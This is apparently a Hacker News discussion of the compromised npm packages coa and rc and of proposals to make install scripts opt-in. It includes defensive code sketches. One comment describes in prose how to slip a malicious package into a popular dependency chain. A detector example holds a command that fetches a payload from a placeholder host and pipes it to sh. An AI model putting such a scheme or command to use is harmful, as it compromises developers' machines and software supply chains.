RFC: https://github.com/npm/rfcs/pull/488
Related HN post: https://news.ycombinator.com/item?id=29122473
1) The vast majority of packages on npm don't require install scripts to work.
2) Many of them that currently include install scripts are just ads asking people to contribute code or money to their project.
1. You add a totally "safe" dependency that you control, let's call it "shell-dependency", as an innocuous part of a PR to a "popular-package". Again, even if you inspect this package, it's totally fine. The current version of shell-dependency is 1.0.0, but it of course goes into the package.json as "1.x.x".
2. You now add a malicious dependency, "malicious-package", to shell-dependency and bump shell-dependency to 1.0.1, meaning every consumer of "popular-package" now gets your "malicious-package".
Notice that this was accomplished with zero traceable GitHub history. Unless every package up the line uses a package-lock.json (which is explicitly recommended against unless you are an end-user application), "malicious-package" is able to enter the dependency chain undetected. If it required some sort of code import, then it would have more opportunities to be spotted. There are of course ways to do this with attacks that require running code as well, but this makes it super easy, especially considering that people often install packages as root, even when they run their apps not as root.
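To make step 2 concrete, here is a rough sketch of why a "1.x.x" range silently accepts the bumped 1.0.1. It is a toy matcher written for this example, not the real `semver` package, and it only understands plain MAJOR.MINOR.PATCH versions; the function name `matchesXRange` is made up.

```javascript
// Toy x-range matcher (an illustration, NOT the real `semver` package).
// Assumes plain "MAJOR.MINOR.PATCH" versions with no prerelease tags.
function matchesXRange(version, range) {
  const have = version.split(".");
  const want = range.split(".");
  if (have.length !== 3 || want.length !== 3) return false;
  // Each range component must be a wildcard or equal the version's component.
  return want.every(
    (part, i) => part === "x" || part === "*" || part === have[i]
  );
}

console.log(matchesXRange("1.0.0", "1.x.x")); // the version that was reviewed
console.log(matchesXRange("1.0.1", "1.x.x")); // the later bump that pulls in malicious-package
console.log(matchesXRange("2.0.0", "1.x.x")); // a new major is the only thing kept out
```

Both 1.0.0 and 1.0.1 match, so nothing in popular-package's own repository has to change for the new dependency to arrive.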
Regardless, just because there are additional vectors to exploit the user doesn't mean closing off one vector isn't worth doing.
For example, if I installed a command line arguments parser and it claimed to require running a setup script, I would immediately be very suspicious.
For a huge package like TypeScript, I'd probably just immediately let the script run and trust Microsoft to not publish malware (and NPM to not change the package contents).
1. The people involved are developers using development components, who are much better equipped to understand an installation failure and take proper action than an end user who is just trying to click through to play a video game or something. But more importantly:
2. The vast majority of the installs happen on automated machines (like CI), where you definitely want to fail when something drastically different happens like a new package is all of a sudden running a script. The tests would fail, you would look at the reason, it would be because some weird script is about to run on the machine, and you'd adjust your PR accordingly. This allows multiple levels of consideration: 1) the original author deciding to do something about the failed install (even if it's just appending the flag and not thinking about it), and 2) the PR reviewer having code-as-data evidence that this code change would mean new foreign code not represented in the commits will be running on their machines. This is huge.
The other important point is that packages have different risk models depending on whether you are installing them locally or on production machines, where a malicious package could be catastrophic. That's why the RFC allows individual user configuration where you explicitly allow certain packages "from now on" (which I think is the way most people want to think about this: the first time you install something, it warns you and you look into it, but from then on you say "this one is good"). On the other hand, the actual scripts and repository have no such configuration and thus require the installation to include the specific flags, again clearly documenting the expected results of a seemingly innocent process that can currently have bad consequences.
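As a rough illustration of the CI behaviour described above, the check could look something like the sketch below. The input shapes and the function name `findUnapprovedInstallScripts` are my own assumptions, not anything taken from the RFC; the only real npm detail is the three lifecycle script names.

```javascript
// npm lifecycle scripts that run at install time.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

// Hypothetical shapes: `installed` is [{ name, scripts }] as read from each
// dependency's package.json; `allowlist` holds names someone has approved.
function findUnapprovedInstallScripts(installed, allowlist) {
  const allowed = new Set(allowlist);
  return installed
    .filter((pkg) =>
      LIFECYCLE_HOOKS.some((hook) => Boolean((pkg.scripts || {})[hook]))
    )
    .filter((pkg) => !allowed.has(pkg.name))
    .map((pkg) => pkg.name);
}

const installed = [
  { name: "typescript", scripts: {} },
  { name: "popular-package", scripts: { test: "node test.js" } },
  { name: "malicious-package", scripts: { preinstall: "node setup.js" } },
];

const offenders = findUnapprovedInstallScripts(installed, ["typescript"]);
// A CI wrapper would exit non-zero here whenever the list is non-empty.
console.log("Unapproved install scripts:", offenders);
```

The point is that the failure names the new package, so the PR author and the reviewer both see that foreign code is about to run.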
Note how the referenced VirusTotal result has 40+ detections [1]. I'm still wondering why info like this isn't used by PyPI and NPM. Chocolatey has VirusTotal integration for all releases.
And it's not like VirusTotal is the only option: there is CAPE [2] for dynamic execution, MetaDefender, and Intezer Analyze, just to name a few.
Really confusing for such a vital supply chain component to be this easily abused.
One of the highlights was when someone recently used NPM to spread ransomware via a fake Roblox API package.[3]
[1] https://www.virustotal.com/gui/file/26451f7f6fe297adf6738295...
[2] https://github.com/kevoreilly/CAPEv2
[3] https://www.reddit.com/r/programming/comments/qgz0em/fake_np...
I was contracted to help build a malware analysis pipeline for PyPI[1][2]. We don't currently have a VirusTotal detector/analyzer (IIRC, we couldn't get a high-enough volume API token on short order), but I think any work towards that would be greatly appreciated by both the PyPA members and the Python packaging community!
[1]: https://pyfound.blogspot.com/2018/12/upcoming-pypi-improveme...
[2]: https://github.com/pypa/warehouse/tree/main/warehouse/malwar...
We're consuming everything we can about a package to figure this out. We've built a static analysis system to reason about code (it's not perfect, but we're getting better and better). We process all the data we can get, then build analytics, heuristics and ML models to extract evidence. The evidence is then pieced together to identify software supply chain risk.
In this case there is a lot of signal to show both bad and suspicious things are happening.
1. Obfuscation: this creates a comparatively deep AST of the code, and isn't difficult to identify.
2. Command execution: curl, wget, and LOLBINs like certutil are pretty easy to identify. This isn't a slam dunk every time you see it, but it adds evidence to a potentially malicious claim.
3. URLs: These are uncommon in libraries and add evidence.
4. Pre/Post install scripts: These are fairly commonly used for other things as well, but invoking node on a source file that is likely obfuscated is a good sign something suspicious is happening.
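Purely as an illustration of how signals like these four might be combined, here is a toy sketch. It is not our actual system: it uses maximum bracket nesting as a crude stand-in for AST depth, and the threshold, patterns, and names (`maxNestingDepth`, `collectEvidence`) are made up for the example.

```javascript
// Crude stand-in for AST depth: maximum bracket nesting in the source text.
function maxNestingDepth(source) {
  let depth = 0;
  let max = 0;
  for (const ch of source) {
    if (ch === "(" || ch === "[" || ch === "{") {
      depth += 1;
      if (depth > max) max = depth;
    } else if (ch === ")" || ch === "]" || ch === "}") {
      depth = Math.max(0, depth - 1);
    }
  }
  return max;
}

// Collects evidence labels; the threshold and patterns are illustrative guesses.
function collectEvidence(pkg) {
  const evidence = [];
  const hooks = ["preinstall", "install", "postinstall"];
  const scripts = pkg.scripts || {};
  if (maxNestingDepth(pkg.source) > 20) evidence.push("deep-nesting");
  if (/\b(curl|wget|certutil)\b/.test(pkg.source)) evidence.push("command-execution");
  if (/https?:\/\//.test(pkg.source)) evidence.push("url");
  if (hooks.some((hook) => /^node\s+\S+/.test(scripts[hook] || ""))) {
    evidence.push("install-script-runs-node");
  }
  return evidence;
}

// Made-up sample package; example.invalid is a reserved, non-resolving domain.
const sample = {
  source: 'require("child_process").exec("curl http://example.invalid/payload | sh")',
  scripts: { preinstall: "node setup.js" },
};
console.log(collectEvidence(sample));
```

No single label is a verdict on its own; the idea is only that several weak signals on the same package add up.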
We're trying to build everything fast enough to make the target far less attractive for attackers before it gets a lot worse.
Honestly, I'm strongly considering moving away from the NPM ecosystem because it's clearly become a target for malware.
Here's Far Manager, which for some reason has some hits on VirusTotal
https://github.com/vouch-dev/vouch
Vouch lets users create and share reviews for NPM packages. Project dependencies can then be checked against those reviews.
Vouch uses extensions to interface with package ecosystems. It's simple to create a new extension. Extensions currently exist for NPM, PyPI, and Ansible Galaxy.
I'm currently working on a website to index known reviews and publish official reviews.
I hope you guys find it useful! Drop by the Matrix channel if you have any feedback to share: #vouch:matrix.org
There are a couple more straightforward ways to do this:
1. Require 2FA, ideally hardware key 2FA, for anyone publishing a package with any sizable following.
2. Make running of preinstall/install scripts opt-in.
3. Make the semantic versioning syntax optionally more restrictive. If I specify I want version ^2.2.1, I'd like to be able to specify that I DON'T want to pull 2.2.2 the moment it becomes available, but perhaps want some amount of latency before pulling that.
But the review process does not need to re-start from scratch. Reviews from other versions can be used to lessen the workload.
On the subject of automatically updating packages: the Vouch dependency analysis can be included in CI. Unreviewed or review-failing dependency updates can be flagged for attention.
Is there an example of a generated report?
Why the fuck do all these leftpad is-even hello-world tic-tac-toe packages have millions of downloads?
20-30 LoC maybe. `process.argv.slice(2).forEach(str => ... )`.
there is no access to the raw command-line invocation, sadly, so you really can't do anything fancier than that.
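for the curious, something along these lines is what I mean. it's a minimal sketch, not what any published parser actually does: it only understands `--key=value`, `--flag`, a bare `--` separator, and positionals, and treats anything else (including short flags like `-v`) as positional.

```javascript
// Minimal argument parser sketch: --key=value, --flag, "--", and positionals.
function parseArgs(argv) {
  const options = {};
  const positionals = [];
  let onlyPositionals = false;
  argv.forEach((str) => {
    if (onlyPositionals || !str.startsWith("--")) {
      positionals.push(str);
    } else if (str === "--") {
      onlyPositionals = true; // everything after a bare "--" is positional
    } else {
      const eq = str.indexOf("=");
      if (eq === -1) {
        options[str.slice(2)] = true; // bare flag
      } else {
        options[str.slice(2, eq)] = str.slice(eq + 1); // --key=value
      }
    }
  });
  return { options, positionals };
}

console.log(parseArgs(process.argv.slice(2)));
```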
>config loading
that thing "RC" package does - looking up the config file in random locations - is really strange to me. aren't you the one in control of where it is stored?
And perhaps some faked download numbers to lend an air of authenticity.
NPM meanwhile is a neverending net of tiny oneliner packages, required by other oneliner packages, required by twoliner packages, required by single-function packages, required by... required by React. And thus, adding malware to `is-number` adds it to all 8766235452 packages that depend on it.
Part of the NPM issue is that everything gets atomized into tiny libraries and no one seems to care about the dependency explosion.
Edit: without looking at it beforehand
I know people keep saying post-install scripts should be opt-in, but then malware will just wait for first run instead.
How about an option to refuse to install any packages that have been published in the past week/2 weeks? That way hopefully malware like this would have been spotted before you end up running it locally.
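A sketch of what that filter could look like, assuming you already have a map from version to publish date. The input shape, the function name `versionsOldEnough`, and the dates below are all made up for illustration.

```javascript
const DAY_MS = 24 * 60 * 60 * 1000;

// `publishTimes` maps version -> ISO publish date (hypothetical input shape).
// Returns the versions published at least `minAgeDays` before `now`.
function versionsOldEnough(publishTimes, minAgeDays, now) {
  const cutoff = now.getTime() - minAgeDays * DAY_MS;
  return Object.keys(publishTimes).filter(
    (version) => new Date(publishTimes[version]).getTime() <= cutoff
  );
}

// Illustrative dates only, not the real publish history of any package.
const publishTimes = {
  "1.2.8": "2018-01-12T00:00:00Z",
  "1.2.9": "2021-11-04T00:00:00Z",
};
const now = new Date("2021-11-05T00:00:00Z");
console.log(versionsOldEnough(publishTimes, 14, now)); // only 1.2.8 is old enough
```

The resolver would then pick the highest version from the filtered list instead of from everything published.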
Of course, if the attacker has access to their npm account, they can probably change the email address associated with the account too, so change-of-email requests should send a "Thank you for changing your email address" to the original address.
The developer might have difficulty regaining control of the account, but hopefully they could inform the npm security team who could quite quickly confirm that a malicious package had been uploaded, which would be enough to get the malicious package taken down and the account locked.
It links to the github repo, where the latest commit is from 2018 for version 1.2.8.
It links to npmjs page, that shows 48 versions, where the latest version is 1.2.8 from "3 years ago".
Yet it has 1.2.9/1.3.9/2.3.9 for "Affected versions".
Did npmjs "revert" these versions and any clue of their existence? The npmjs page links to dominictarr's repository. The npmjs site doesn't seem to have a "who owns this package name" besides the repository/homepage links. Very confusing.
I remember some years ago there was some story involving the original author handing maintainership rights to some shady dude. Is it about that time, or is it about something more current?
I pointed this flaw out repeatedly in the Rust forums when there were discussions related to improvements that could be made to crates.io. They made it very clear that "everyone understands" that crates themselves are the "source of truth", and that nobody should be doing security reviews by going to GitHub or wherever.
So what happens in reality?
Precisely what you just did. People instinctively click the source repo link, and browse around in the GitHub history view to "see what happened".
Sigh.
It's like trying to explain to someone that the cargo lift design of the Death Star is dangerous without handrails. Then someone points out that when you signed up to be a Stormtrooper on the Death Star there was a clause in the contract (page 537 paragraph 7) that clearly states that it is your responsibility to avoid fatal falls due to precipitous ledges.
That is, for sensitive apps, I don't want to use versions that are less than, say, a month or so old unless I specifically override it. I want to stay up-to-date but not too bleeding edge, specifically to avoid situations like this.
An attacker who had control over an account would wait until just such a moment to add their own version which includes a much worse payload, and people would rush to download it, thinking they were just installing a fix for the minor vulnerability.
What's nuts is that any of these projects (whether they be single components, larger utilities, or full-blown apps) require a build step that involves anything more complicated[1] than a single machine-readable document in the web browser's native file format and that sits alongside (or in place of[2]) the project README. With so many programmers writing code for the express purpose of making digital documents with behavior dynamic enough to trick you into thinking that the page you have open is really an app, no one in the community with any clout ever stops and says, "Gee, since we're at it, maybe we ought to take this tech that enables us to securely run code on demand and focus it on the goal of allowing other programmers to configure all these modules that we're sharing with one another, or to handle the finishing step of a collection of modules that make up a given app."
Then again, that would presume that any of the stuff that this industry engages in is actually meant to solve any problem, rather than creating a neverending supply of them in order to justify the paychecks being written and the egos they're feeding. If stuff's not laughably overengineered to the point of constantly breaking for no good reason[3], does it even count as "real"[4] programming?
1. https://www.colbyrussell.com/2019/03/06/how-to-displace-java...
2. https://news.ycombinator.com/item?id=28407936
> Since then, the npm security team has removed all the compromised coa and rc versions to prevent developers from accidentally infecting themselves.
Removing all trace of evidence is not something "security teams" should do. Instead of sweeping security incidents under the rug (where twitterverse resides), they should at least mention the existence of these versions and that they contain malware on the package page.
NPM package ‘ua-parser-JS’ with more than 7M weekly download is compromised - https://news.ycombinator.com/item?id=28962168 - Oct 2021 (141 comments)
I mean, a package.json with changing permissions and an alert or manual confirmation step could've easily fixed this.
NPM is pretty much the definition of a security nightmare, because you cannot guarantee anything.
Any dependency down the tree can compromise anything upstream.
I think that package managers must offer build bots that use the source code (git repositories) as the source of truth rather than their own packages. That's the only way that comes to mind to guarantee that the publisher of the package is actually the same owner.
If a git repo changes, warn all users. If a permission changes, warn all users. If a header/symbol file changes, warn all users.
npm install foo@3.1.7
And it, by default, inserts "foo@^3.1.7", which means "anything 3.1.7 or higher, but not 4.x.x". In other words, the next time someone installs the dependencies it could be 3.1.8, 3.9.7, 3.1234.999, etc.
But maybe it should default to just the actual version, and all upgrades should be required to be manual. Checking my HD, I see I have lots of references to "rc@^1.1.6", "rc@^1.2.8", etc., all of which would install 1.2.9 if I reinstalled the deps.
"version": "1.2.8",
Pfew, really lucky. Going to nuke npm now.
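For anyone unsure what the caret default actually admits, here is a small sketch of the rule (changes are allowed as long as the left-most non-zero component stays the same). It is a toy written for this comment, not the real `semver` package, and it ignores prerelease tags; the helper names are made up.

```javascript
function parseVersion(version) {
  return version.split(".").map(Number);
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i += 1) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Toy caret check for plain MAJOR.MINOR.PATCH versions.
function satisfiesCaret(version, range) {
  const v = parseVersion(version);
  const base = parseVersion(range.slice(1)); // drop the leading "^"
  if (compareVersions(v, base) < 0) return false; // older than the base version
  const firstNonZero = base.findIndex((n) => n !== 0);
  const lockedUpTo = firstNonZero === -1 ? 2 : firstNonZero;
  // Every component up to and including the left-most non-zero one must match.
  return base.slice(0, lockedUpTo + 1).every((n, i) => n === v[i]);
}

["1.2.8", "1.2.9", "1.3.9", "2.3.9"].forEach((version) => {
  console.log(version, satisfiesCaret(version, "^1.2.8"));
});
```

With "rc@^1.2.8", both 1.2.9 and 1.3.9 are accepted on a fresh install, while 2.3.9 is not.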